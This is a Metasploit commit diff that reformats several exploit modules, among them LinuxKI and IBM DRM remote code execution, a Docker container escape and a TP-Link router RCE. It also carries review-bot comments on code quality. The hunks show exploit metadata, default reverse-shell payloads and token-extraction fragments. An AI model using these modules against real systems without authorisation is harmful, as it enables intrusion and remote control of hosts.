Run rubocop on exploit modules
adfoster-r7 committed Feb 8, 2023
1 parent 9469c83 commit 25ee41d
Showing 20 changed files with 282 additions and 297 deletions.
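--- a/modules/exploits/linux/http/axis_app_install.rb
+++ b/modules/exploits/linux/http/axis_app_install.rb
@@ -48,8 +48,7 @@ def initialize(info = {})
 'Platform' => 'linux',
 'Arch' => [ARCH_ARMLE],
 'Type' => :linux_dropper,
-'Payload' => {
-},
+'Payload' => {},
 'DefaultOptions' => {
 'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp' # Use stagless payloads until issue 16107 gets addressed to fix the ARMLE stager
 }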
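--- a/modules/exploits/linux/http/ibm_drm_rce.rb
+++ b/modules/exploits/linux/http/ibm_drm_rce.rb
@@ -154,7 +154,7 @@ def free_the_admin(session_id)
 'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
 })
 
-unless res && (res.code == 200) && res.body[/"data":"([0-9a-f\-]{36})/]
+unless res && (res.code == 200) && res.body[/"data":"([0-9a-f-]{36})/]
 fail_with(Failure::Unknown, "#{peer} - Failed to obtain the admin password.")
 end
 
@@ -189,7 +189,7 @@ def login_and_csrf(password)
 'cookie' => cookie
 })
 
-unless res && (res.code == 200) && res.body =~ /var csrfToken = "([0-9a-f\-]{36})";/
+unless res && (res.code == 200) && res.body =~ /var csrfToken = "([0-9a-f-]{36})";/
 fail_with(Failure::Unknown, "#{peer} - Failed to authenticate obtain CSRF cookie.")
 end
 csrf = Regexp.last_match(1)
@@ -269,7 +269,7 @@ def obtain_bearer_token(password)
 'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
 })
 
-unless res && (res.code == 200) && res.body =~ /"data":\{"access_token":"([0-9a-f\-]{36})","token_type":"bearer"/
+unless res && (res.code == 200) && res.body =~ /"data":\{"access_token":"([0-9a-f-]{36})","token_type":"bearer"/
 fail_with(Failure::Unknown, "#{peer} - Failed to obtain Bearer token.")
 end
 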
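Review bot: The failure message in login_and_csrf, `Failed to authenticate obtain CSRF cookie.`, is missing a word and says cookie where the regex on the line above captures `csrfToken`; `fail_with(Failure::Unknown, "#{peer} - Failed to authenticate and obtain CSRF token.")` reads correctly. The three guards also mix two match idioms, `res.body[/…/]` in free_the_admin and `=~` in the other two, and only login_and_csrf visibly reads the capture through `Regexp.last_match(1)`; using `=~` in all three would keep them parallel. All three functions start and end outside their hunks.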
120 changes: 60 additions & 60 deletions modules/exploits/linux/http/linuxki_rce.rb
@@ -14,69 +14,69 @@ class MetasploitModule < Msf::Exploit::Remote

def initialize(info = {})
super(
update_info(
info,
'Name' => 'LinuxKI Toolset 6.01 Remote Command Execution',
'Description' => %q{
This module exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.
The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
},
'License' => MSF_LICENSE,
'Author' => [
'Cody Winkler', # discovery and poc
'numan türle' # msf exploit
update_info(
info,
'Name' => 'LinuxKI Toolset 6.01 Remote Command Execution',
'Description' => %q{
This module exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.
The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
},
'License' => MSF_LICENSE,
'Author' => [
'Cody Winkler', # discovery and poc
'numan türle' # msf exploit
],
'References' => [
['EDB', '48483'],
['CVE', '2020-7209'],
['PACKETSTORM', '157739'],
['URL', 'https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78']
],
'Privileged' => false,
'Platform' => ['php', 'unix', 'linux'],
'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64],
'Targets' => [
[
'Automatic (PHP In-Memory)',
{
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Type' => :php_memory,
'Payload' => { 'BadChars' => "'" },
'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }
}
],
'References' => [
['EDB', '48483'],
['CVE', '2020-7209'],
['PACKETSTORM', '157739'],
['URL', 'https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78']
[
'Automatic (PHP Dropper)',
{
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Type' => :php_dropper,
'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }
}
],
'Privileged' => false,
'Platform' => ['php', 'unix', 'linux'],
'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64],
'Targets' => [
[
'Automatic (PHP In-Memory)',
{
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Type' => :php_memory,
'Payload' => { 'BadChars' => "'" },
'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }
}
],
[
'Automatic (PHP Dropper)',
{
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Type' => :php_dropper,
'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }
}
],
[
'Automatic (Unix In-Memory)',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_memory,
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
}
],
[
'Automatic (Linux Dropper)',
{
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :linux_dropper,
'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
}
]
[
'Automatic (Unix In-Memory)',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_memory,
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
}
],
'DisclosureDate' => '2020-05-17',
'DefaultTarget' => 0
)
[
'Automatic (Linux Dropper)',
{
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :linux_dropper,
'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
}
]
],
'DisclosureDate' => '2020-05-17',
'DefaultTarget' => 0
)
)

register_options([
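--- a/modules/exploits/linux/http/pandora_fms_events_exec.rb
+++ b/modules/exploits/linux/http/pandora_fms_events_exec.rb
@@ -109,7 +109,7 @@ def check
 
 full_version = full_version.text
 
-version = full_version[1..-1].sub('NG', '')
+version = full_version[1..].sub('NG', '')
 
 if version.blank?
 return CheckCode::Detected('Could not determine the Pandora FMS version.')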
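Review bot: `full_version[1..]` returns nil when `full_version` is an empty string, so the chained `.sub('NG', '')` raises NoMethodError before the `version.blank?` guard two lines later can return `CheckCode::Detected`. Coercing first, `version = full_version[1..].to_s.sub('NG', '')`, lets an empty version element fall through to the existing blank check instead of aborting the check with an exception. The old `[1..-1]` form behaved the same way, so this predates the commit. `check` begins and ends outside the hunk, and whether `.text` can actually be empty depends on lines not shown.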
48 changes: 24 additions & 24 deletions modules/exploits/linux/local/docker_privileged_container_escape.rb
@@ -16,30 +16,30 @@ class MetasploitModule < Msf::Exploit::Local

def initialize(info = {})
super(
update_info(
info,
{
'Name' => 'Docker Privileged Container Escape',
'Description' => %q{
This module escapes from a privileged Docker container and obtains root on the host machine by abusing the Linux cgroup notification on release
feature. This exploit should work against any container started with the following flags: `--cap-add=SYS_ADMIN`, `--privileged`.
},
'License' => MSF_LICENSE,
'Author' => ['stealthcopter'],
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_MIPSLE, ARCH_MIPSBE],
'Targets' => [['Automatic', {}]],
'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 20 },
'SessionTypes' => ['shell', 'meterpreter'],
'DefaultTarget' => 0,
'References' => [
['EDB', '47147'],
['URL', 'https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/'],
['URL', 'https://github.com/stealthcopter/deepce']
],
'DisclosureDate' => '2019-07-17' # Felix Wilhelm @_fel1x first mentioned on twitter Felix Wilhelm
}
)
update_info(
info,
{
'Name' => 'Docker Privileged Container Escape',
'Description' => %q{
This module escapes from a privileged Docker container and obtains root on the host machine by abusing the Linux cgroup notification on release
feature. This exploit should work against any container started with the following flags: `--cap-add=SYS_ADMIN`, `--privileged`.
},
'License' => MSF_LICENSE,
'Author' => ['stealthcopter'],
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_MIPSLE, ARCH_MIPSBE],
'Targets' => [['Automatic', {}]],
'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 20 },
'SessionTypes' => ['shell', 'meterpreter'],
'DefaultTarget' => 0,
'References' => [
['EDB', '47147'],
['URL', 'https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/'],
['URL', 'https://github.com/stealthcopter/deepce']
],
'DisclosureDate' => '2019-07-17' # Felix Wilhelm @_fel1x first mentioned on twitter Felix Wilhelm
}
)
)
register_advanced_options(
[
72 changes: 36 additions & 36 deletions modules/exploits/linux/local/su_login.rb
@@ -16,43 +16,43 @@ class MetasploitModule < Msf::Exploit::Local

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Login to Another User with Su on Linux / Unix Systems',
'Description' => %q{
This module attempts to create a new login session by
invoking the su command of a valid username and password.
If the login is successful, a new session is created via
the specified payload.
Because su forces passwords to be passed over stdin, this
module attempts to invoke a psuedo-terminal with python,
python3, or script.
},
'License' => MSF_LICENSE,
'Author' => 'Gavin Youker <youkergav@gmail.com>',
'DisclosureDate' => '1971-11-03',
'Platform' => ['linux', 'unix'],
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' => [
[
'Linux x86', {
'Arch' => ARCH_X86,
'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
}
],
[
'Linux x86_64', {
'Arch' => ARCH_X64,
'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
}
],
update_info(
info,
'Name' => 'Login to Another User with Su on Linux / Unix Systems',
'Description' => %q{
This module attempts to create a new login session by
invoking the su command of a valid username and password.
If the login is successful, a new session is created via
the specified payload.
Because su forces passwords to be passed over stdin, this
module attempts to invoke a psuedo-terminal with python,
python3, or script.
},
'License' => MSF_LICENSE,
'Author' => 'Gavin Youker <youkergav@gmail.com>',
'DisclosureDate' => '1971-11-03',
'Platform' => ['linux', 'unix'],
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' => [
[
'Linux x86', {
'Arch' => ARCH_X86,
'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
}
],
'DefaultTarget' => 0,
'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
'SessionTypes' => ['shell', 'meterpreter']
)
[
'Linux x86_64', {
'Arch' => ARCH_X64,
'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
}
],
],
'DefaultTarget' => 0,
'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
'SessionTypes' => ['shell', 'meterpreter']
)
)

register_options([
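--- a/modules/exploits/linux/local/sudo_baron_samedit.rb
+++ b/modules/exploits/linux/local/sudo_baron_samedit.rb
@@ -186,7 +186,7 @@ def do_post_exploit_checks
 if resolved_indices.length > 1
 print_status('')
 print_status('Alternative exploit target(s) exist for this OS version:')
-resolved_indices[1..-1].each { |index| print_status("#{index}: #{targets[index].name}") }
+resolved_indices[1..].each { |index| print_status("#{index}: #{targets[index].name}") }
 print_status('Run `set target <id>` to select an alternative exploit script')
 end
 end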
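--- a/modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb
+++ b/modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb
@@ -298,7 +298,7 @@ def create_injection(c, literal: false)
 def update_len_field(packet, payload_length)
 new_packet = packet[0..3]
 new_packet += [payload_length].pack('S>')
-new_packet += packet[6..-1]
+new_packet += packet[6..]
 new_packet
 end
 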
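Review bot: update_len_field has no comment stating the packet layout it relies on, and `packet[6..]` returns nil for a packet shorter than six bytes, which makes the `+=` on that line raise TypeError. A header comment such as `# Rewrites the 16-bit big-endian length field at bytes 4-5; packet must be at least 6 bytes.` documents the contract, and `raise ArgumentError, 'packet too short' if packet.length < 6` as the first line enforces it. `pack('S>')` writes a 16-bit field, so a payload_length above 65535 cannot be represented and is worth rejecting in the same guard.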
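--- a/modules/exploits/linux/redis/redis_debian_sandbox_escape.rb
+++ b/modules/exploits/linux/redis/redis_debian_sandbox_escape.rb
@@ -56,8 +56,7 @@ def initialize(info = {})
 'Platform' => 'unix',
 'Arch' => ARCH_CMD,
 'Type' => :unix_cmd,
-'Payload' => {
-},
+'Payload' => {},
 'DefaultOptions' => {
 'PAYLOAD' => 'cmd/unix/reverse_bash'
 }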
